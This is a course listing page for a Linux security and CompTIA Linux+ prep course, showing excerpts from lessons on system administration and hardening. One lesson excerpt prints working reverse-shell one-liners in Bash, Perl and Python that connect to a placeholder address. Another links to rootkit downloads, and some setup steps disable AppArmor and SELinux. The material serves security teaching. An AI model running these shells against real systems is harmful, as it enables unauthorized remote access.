Linux For InfoSec & Comptia Linux+ Exam Prep

Or log in to access your purchased courses
COURSE DETAILS

The Linux for InfoSec Professionals course is a “Zero to Hero” style of training program designed to take someone with little to no Linux experience up to a highly competent Linux practitioner. It will not only teach you the security concepts and guidelines that will keep your Linux servers safe, it will walk you through hardening measures step-by-step.

This course also serves as a great prep guide for the Comptia Linux+ certification.

The CompTIA Linux+ certification covers common tasks in major distributions of Linux, including the Linux command line, basic maintenance, installing and configuring workstations, and networking. Linux+ is comprised of two exams – LX0-103 and LX0-104. Candidates must pass LX0-103 before taking LX0-104.

Unlike Security+ and Network+, you never have to renew the Linux+ certification. This accreditation is good for life. There are no Continuing Education (CE) requirements.

Avatar
Course By

Joseph McCray

Lessons

C1L1: Getting Familiar with VMWare

Free Preview

Author: Joseph McCray

For this workshop, the required prerequisite is the latest version of VMWare Workstation (Windows/Linux), Fusion (Mac), or Workstation Player(Windows/Linux). A 30-day trial of Workstation 12.1.1 can be downloaded from here: http://www.vmware.com/products/workstation/workstation-evaluation   A 30-day trial of Fusion 8 can be downloaded from here: https://www.vmware.com/products/fusion/fusion-evaluation.html   The newest version of VMWare Workstation Player 12.1.1 can be [...]

C1L3: Installing VMware Workstation Player

Author: Joseph McCray

INSTALLING VMWARE WORKSTATION PLAYER   First download the player from the following link: https://my.vmware.com/en/web/vmware/free#desktop_end_user_computing/vmware_workstation_player/12_0   We are going to download the Windows version. The filename will default to the correct…

C1L4: Download the InfoSec Addicts Virtual Machine

Author: Joseph McCray

you can go to the following link and download and create your own virtual machine. https://s3.amazonaws.com/infosecaddicts-vms/Ubuntu-17-10-InfoSecAddictsVM.zip username: infosecaddicts password: infosecaddicts https://s3.amazonaws.com/infosecaddicts-vms/Win7x64.zip username: workshop username: password If not yet downloaded you…

C1L6: Download and install the attack VM

Author: Joseph McCray

You can go to the following link and download and create your own virtual machine. https://s3.amazonaws.com/infosecaddicts-vms/Ubuntu-17-10-InfoSecAddictsVM.zip username: infosecaddicts password: infosecaddicts https://s3.amazonaws.com/infosecaddicts-vms/Win7x64.zip username: workshop username: password Extract the contained directory to…

C1L8: Installing open-vm-tools

Author: Joseph McCray

As we are working on a Linux variant (Ubuntu) that supports open-vm-tools via the repository, we can ignore the VMware warning to update the tools. Once installed they will be kept up-to-date…

C2L1: Basic Linux Commands

Author: Joseph McCray

Let’s get started with some basic Linux commands. These commands provide a wealth of information to the pentester allowing them to successfully navigate and exploit the target system. To open…

C2L2: The power of ls

Author: Joseph McCray

THE POWER OF LS COMMAND The ls command is probably the most commonly used command and can provide lots of useful information. The ls (list) command lists information about the file(s) within a directory.…

C2L3: How to find stuff in Linux

Author: Joseph McCray

You’ll often find yourself looking for things. Here are some useful tips for just that. There are some commands that have proven useful for finding things in Linux. find is a…

C2L4: What is Vim?

Author: Joseph McCray

Vim is a text editor available in most Unix systems. It is an acronym for Vi Improved. Vim was originally developed by Bram Moolenaar as a clone of Bill Joy’s vi editor…

C2L5: Getting Started

Author: Joseph McCray

First off, vim has a fairly extensive man page accessible with the following command: man vim – view the manual page for vim To begin with launch vim from a command…

C2L6: Modes within vim

Author: Joseph McCray

Command mode – Otherwise the default mode when you launch or open a file in vim. This mode allows you to navigate around the file in a manner which does not…

C2L7: Basic Keyboard Commands

Author: Joseph McCray

BASIC KEYBOARD COMMANDS All of these commands must be entered via Last Line mode, as such they will be preceded by the colon ‘ : ‘ character when listed below. All text…

C3L1: Basic Shell Scripting

Author: Joseph McCray

BASIC SHELL SCRIPTING A Bash script is the plain text file that contains a series of commands. These commands are a mixture of commands we would normally type ourselves on…

C5L3: Preliminary Information

Author: Joseph McCray

We are using a domain of tps-ubuntu1604.example.com on IP address 192.168.10.139 with a Gateway address of 192.168.10.2. Be sure to change these to something more appropriate with your local environment. We have installed and are…

C5L5: Changing the default Shell

Author: Joseph McCray

Default, the shell is set to /bin/dash. This will cause issues with later tools such as ISPConfig, so we need to change it to /bin/bash. sudo dpkg-reconfigure dash – Answer No. We can verify…

C5L6: Disable AppArmor

Author: Joseph McCray

AppArmor is a SELinux extension meant to provide a stronger method of securing your server. To install ISPConfig, which we do later in this tutorial, we need to disable AppArmor.

C5L10: MariaDB – Manual Configurations

Author: Joseph McCray

We want MySQL to listen on all the interfaces, not just the localhost. Edit /etc/mysql/mariadb.conf.d/50-server.cnf and comment out the line bind-address = 127.0.0.1: sudo vim /etc/mysql/mariadb.conf.d/50-server.cnf Now we secure our…

C5L13: PHP Opcode cache

Author: Joseph McCray

A free PHP opcode cacher for caching as well as optimizing PHP intermediate code is strongly recommended to speed up your PHP pages. One such option is APCu. sudo apt -y…

C5L14: PHP-FPM

Author: Joseph McCray

To use PHP-FPM with Apache, we need to install the mod_fastcgi Apache module. NOTE: This is not the same as mod_fcgid. sudo apt -y install libapache2-mod-fastcgi php7.0-fpm Enable the module…

C5L15: Additional PHP Versions

Author: Joseph McCray

Though it is possible to have multiple PHP versions on one server (selectable through ISPConfig), which will not be covered in this section. For more info on this, visit: https://www.howtoforge.com/how-to-use-multiple-php-versions-php-fpm-and-fastcgi-with-ispconfig-3-ubuntu-12.10

C5L16: Installing Let’s Encrypt

Author: Joseph McCray

  ISPConfig 3.1 is provided with builtin support for the free SSL Certificate Authority. Let’s encrypt, allowing us to create free SSL certificate for use on our website(s). First, we…

C5L17: Install Mailman

Author: Joseph McCray

ISPConfig allows us to manage Mailman mailing lists. To make use of this feature, we need to install Mailman. sudo apt -y install mailman Select at least one language and…

C5L18: Install PureFTPd and Quota

Author: Joseph McCray

PureFTPd and Quota can be installed together with the following command: sudo apt -y install pure-ftpd-common pure-ftpd-mysql quota quotatool Configure PureFTPd by editing /etc/default/pure-ftpd-common sudo vim /etc/default/pure-ftpd-common Set the start mode…

C5L21: Installing Jailkit

Author: Joseph McCray

Jailkit is only necessary if you need to chroot SSH users into their own/specific directories. It is a set of utilities used to limit user accounts to specific files using…

C5L22: Installing fail2ban and UFW

Author: Joseph McCray

While these are optional, it is recommended to install them as ISPConfig monitor will attempt to log the results of them. Fail2ban is an Intrusion Detection System (IDS), monitors for…

C5L24: Installing ISPConfig 3

Author: Joseph McCray

Install the latest version of ISPConfig3 as follows: cd /tmp sudo wget -O ispconfig.tar.gz https://git.ispconfig.org/ispconfig/ispconfig3/rep… NOTE: The above is one complete command line sudo unzip ispconfig.tar.gz cd ispconfig3-master-e1ceb050e19c7574bca146a8da7047ee4ff456b5 cd install…

C5L25: Install SSHFS

Author: Joseph McCray

Frequently it becomes advantageous to work on and edit files from your VM (especially cloud-based instances) from your local machine. Perhaps you have a favorite IDE that is not available…

C5L26: Installing SSHFS on Ubuntu

Author: Joseph McCray

Install SSHFS: sudo apt-get install sshfs Mounting the Remote File System Create a local directory to mount the remote share, replacing “mount point” with something meaningful to your environment. If…

C5L27: Install Samba

Author: Joseph McCray

Reference: http://www.krizna.com/ubuntu/setup-file-server-ubuntu-14-04-samba/ how to install samba on ubuntu sudo apt-get update sudo apt-get remove samba sudo apt-get install samba mkdir /home/infosecaddicts/samba sudo nano /etc/samba/smb.conf Then press Ctrl-O to save and…

C5L31: Making SSH Aware of MFA

Author: Joseph McCray

Look for PasswordAuthentication, uncomment it and change the “yes” to “no.” Add the following line underneath UsePam yes AuthenticationMethods publickey,keyboard-interactive Save and exit. Now edit the PAM sshd configuration file. sudo vim…

C5L32: Install Mod_Security

Author: Joseph McCray

What is Mod_Security? According to their website, “ModSecurity is another toolkit for monitoring real-time web applications, logging, and access control. Its also an enabler: there contain no hard rules telling you what to…

C5L33: Configuring Mod_Security Rules

Author: Joseph McCray

Create the configuration file with: sudo cp /etc/modsecurity/modsecurity.conf-recommended /etc/modsecurity/modsecurity.conf Then edit the file with: sudo vim /etc/modsecurity/modsecurity.conf Activate the rules by editing and setting the ‘SecRuleEngine’ option to on: Ensure…

C6L2: Preliminary Information

Author: Joseph McCray

CentOS is a cloned version of the commercial Red Hat Linux distribution. This differs from that of the Ubuntu server which is considered a venerable Debian distribution. For this installation…

C6L4: Disable SELinux

Author: Joseph McCray

SELinux is a security extension that is intended to provide additional security to the system. This will be disabled because we are installing ISPConfig later on. Let’s edit the /etc/selinux/config…

C6L6: Quota

Author: Joseph McCray

Disk quotas are used to alert a system admin when too much disk space is being used or when a partition becomes full. Individual Users and User groups can have…

C6L8: Enabling quota on a separate /var partition

Author: Joseph McCray

If you have a separate /var partition, please refer to  https://www.howtoforge.com/tutorial/perfect-server-centos-7-2-apache-mysql-php-pureftpd-postfix-dovecot-and-ispconfig/ vi /etc/fstab _______________________________________________________________________________________________ # # /etc/fstab # Created by anaconda on Sun Sep 21 16:33:45 2014 # # Accessible filesystems,…

C6L10: Install Dovecot

Author: Joseph McCray

Dovecot is an IMAP and POP3 open source server for Linux. It is lightweight, fast and easy to setup mail server developed with security in mind. https://wiki.archlinux.org/index.php/dovecot To install Dovecot, use…

C6L12: Install Postfix

Author: Joseph McCray

Postfix is an open source mail transfer agent (MTA). This software is free under the IBM Public License 1.0. To install Postfix, use the following commands. yum –y install postfix…

C6L13: Install GetMail

Author: Joseph McCray

GetMail is a mail retrieval agent implemented in Python. It is a free software licensed under the GNU General Public License v2. Simply install Getmail as follows. yum –y install…

C6L17: Installation of mod_python

Author: Joseph McCray

mod_python will need to be compiled from source code to run. mod_python is an apache module that embeds the Python interpreter in apache allowing the apache server to execute python.…

C6L18: Install PureFTPD

Author: Joseph McCray

PureFTPD is a free secure file transfer tool for Unix/Linux based systems. Let’s install the tool. Then start the tool yum -y install pure-ftpd systemctl enable pure-ftpd.service systemctl start pure-ftpd.service…

C11L1: Security Concepts – AppArmor

Author: Joseph McCray

What is AppArmor? Reference(s): http://askubuntu.com/questions/236381/what-is-apparmor https://wiki.ubuntu.com/AppArmor https://help.ubuntu.com/community/AppArmor AppArmour is a Kernel security module for Linux and enforces Mandatory Access Control (MAC). This application allows a system administrator to restrict program…

C12L1: Security Concepts – Log Analysis

Author: Joseph McCray

Security Concepts – Log Analysis Linux log basics Reference(s): http://www.thegeekstuff.com/2011/08/linux-var-log-files/ https://help.ubuntu.com/community/LinuxLogFiles Linux log files are usually stored in the /var/log directory of the file system. These logs contain a wealth…

C14L6: Security Concepts -Reverse Shells

Author: Joseph McCray

Reverse Shells Bash bash -i >& /dev/tcp/$IP-ADDRESS/8080 0>&1 PERL perl -e ‘use Socket;$i=”$IP-ADDRESS”;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’ Python Tested under Linux / Python 2.7: python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“$IP-ADDRESS”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’ PHP php -r…

C14L7: Security Concepts – Tunneling

Author: Joseph McCray

Tunneling ICMP Tunneling: http://null-byte.wonderhowto.com/how-to/hack-like-pro-create-nearly-undetectable-covert-channel-with-tunnelshell-0155704/ http://log.lain.li/blog/setting-up-ip-over-icmp-with-hans/ DNS Tunneling: http://resources.infosecinstitute.com/dns-tunnelling/ https://zeltser.com/c2-dns-tunneling/ SSH Tunneling: http://u-tips-n-tricks.blogspot.com/2012/12/ssh-tunnel.html http://magikh0e.ihtb.org/pubPapers/ssh_gymnastics_tunneling.html http://www.linuxjournal.com/content/ssh-tunneling-poor-techies-vpn STunnel: https://www.digitalocean.com/community/tutorials/how-to-set-up-an-ssl-tunnel-using-stunnel-on-ubuntu Reverse SSH Tunneling: https://www.howtoforge.com/reverse-ssh-tunneling

C14L9: Security Concepts – Post Exploitation – Finding backdoors and rootkits

Author: Joseph McCray

Finding backdoors https://www.rawhex.com/2016/03/a-guide-to-recognising-backdoors-using-metasploitable-2/ Rootkits https://packetstormsecurity.com/files/125240/Azazel-Userland-Rootkit.html https://packetstormsecurity.com/files/118317/Linux-2.6-Kernel-proc-Rootkit-Backdoor.html https://packetstormsecurity.com/files/110942/Jynx-Kit-Release-2.html https://packetstormsecurity.com/files/108286/KBeast-Kernel-Beast-Linux-Rootkit-2012.html